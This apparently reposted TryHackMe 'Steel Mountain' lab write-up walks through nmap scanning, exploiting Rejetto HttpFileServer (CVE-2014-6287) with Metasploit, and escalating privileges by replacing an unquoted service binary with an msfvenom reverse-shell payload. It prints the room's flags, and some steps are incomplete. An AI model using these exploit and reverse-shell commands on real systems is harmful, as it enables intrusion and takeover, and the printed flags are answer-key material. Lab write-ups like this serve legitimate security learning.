TryHackMe — Steel Mountain Simple Writeup by Karthikeyan Nagaraj | Mr. Robot | 2023
2023-5-15 16:23:31 Author:查看原文) 阅读量:25 收藏


nmap -sC -sV <MACHINE-IP>


80/tcp open http Microsoft IIS httpd 8.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds

3389/tcp open ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=steelmountain
| Not valid before: 2023-05-09T12:58:47
|_Not valid after: 2023-11-08T12:58:47

8080/tcp open http HttpFileServer httpd 2.3

49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown



1. Who is the employee of the month?

On Navigating to http://<Machine-IP>:80

A person's picture who acts in Mr. Robot Web Series named Bill Harper

On Inspecting the Page Source, we can found his name

Ans: Bill Harper



1. Scan the machine with nmap. What is the other port running a web server on?

Ans: 8080

2. Take a look at the other web server. What file server is running?

We found that it is Http File Server but that’s not the answer

Ans: Rejetto Http File Server

3. What is the CVE number to exploit this file server?

Ans: 2014-6287

4. Use Metasploit to get an initial shell. What is the user flag?

  1. Start metasploit and search for rejetto
search rejetto
use 0
show options

Also, set the Port to 8080 using the Command set RPORT 8080

You will get the Meterpreter Shell

2. Let’s move to the bill’s Directory

cd C:\\Users\\bill\\

3. Let’s Search for the User.txt using the command search -f user.txt

4. Cd into the Directory

cd C:\\Users\\bill\\Desktop\\
cat user.txt

We Found the Flag

Ans: b04763b6fcf51fcd7c13abc7db4fd365



1. Take close attention to the CanRestart option that is set to true. What is the name of the service which shows up as an unquoted service path vulnerability?

  1. Open a New Terminal and download the below Powershell Command File

2. Now on the Metasploit type the below command to upload the file to the target machine (Make sure to enter your Download Location)

load powershell

3. Move to the Directory where you downloaded the Powershell file and then type the Following Commands

 . .\PowerUp.ps1
Ans: AdvancedSystemCareService9

2. What is the root flag?

Let’s create a Payload using the below command

msfvenom -p windows/shell_reverse_tcp LHOST=<Machine-IP> LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe
sc stop AdvancedSystemCareService9
upload Advanced.exe "\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"

Recieved Connection

Ans: 9af5f314f57607c00fd09803a587db80



1. What powershell -c command could we run to manually find out the service name?

Format is “powershell -c “command here”*

Ans: powershell -c Get-Service
